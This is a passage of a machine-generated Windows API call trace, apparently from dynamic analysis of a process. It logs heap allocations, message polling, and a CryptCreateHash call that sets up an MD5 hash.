hHeap=0x970000) returned 1 [0211.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.439] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0211.439] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.439] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0211.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0211.440] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0211.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0211.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0211.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0211.440] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0211.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0211.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0211.440] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0211.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0211.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0211.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0211.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0211.440] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0211.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0211.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0211.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0211.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0211.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0211.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0211.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0211.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0211.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0211.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0211.440] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.440] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0211.440] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0211.441] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0211.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0211.441] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0211.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80220 | out: hHeap=0x970000) returned 1 [0211.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0211.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0211.441] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0211.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0211.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.441] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0211.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0211.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0211.441] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0211.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0211.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0211.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0211.441] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0211.441] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.441] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0211.441] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0211.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0211.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0211.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0211.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0211.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ffb8 [0211.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0211.442] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0211.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ffb8 | out: hHeap=0x970000) returned 1 [0211.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0211.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0211.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0211.442] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0211.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0211.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0211.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0211.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0211.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0211.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0211.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0211.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0211.442] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0211.442] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0211.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0211.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0211.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0211.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0211.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0211.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0211.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0211.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0211.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0211.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0211.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0211.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0211.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0211.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0211.443] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0211.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0211.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0211.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c68 [0211.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0211.443] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0211.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0211.443] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0211.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0211.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0211.443] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0211.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0211.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0211.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0211.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0211.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0211.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0211.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0211.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0211.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0211.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0211.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0211.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0211.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0211.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0211.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0211.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0211.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0211.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0211.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0211.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0211.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0211.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0211.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0211.444] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0211.444] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0211.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0211.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0211.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0211.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0211.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0211.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0211.445] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0211.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0211.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0211.445] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0211.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0211.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0211.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0211.445] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0211.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0211.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0211.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0211.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0211.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0211.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0211.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0211.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0211.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0211.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0211.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0211.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0211.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0211.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0211.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0211.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0211.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0211.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0211.446] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0211.446] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0211.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0211.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0211.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0211.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0211.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0211.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0211.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0211.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0211.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0211.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0211.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0211.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0211.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0211.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0211.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0211.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0211.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0211.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0211.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0211.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0211.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0211.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0211.447] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0211.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0211.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0211.447] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0211.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0211.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0211.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0211.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0211.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0211.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0211.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0211.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0211.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0211.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0211.448] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e50b90, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0211.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0211.448] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0211.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0211.448] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0211.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0211.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0211.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0211.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0211.448] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0211.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0211.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0211.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0211.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0211.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0211.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0211.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0211.449] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0211.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0211.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0211.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0211.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0211.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0211.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0211.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0211.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0211.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0211.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0211.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0211.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0211.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0211.449] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0211.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0211.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0211.449] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0211.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0211.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0211.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0211.450] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, 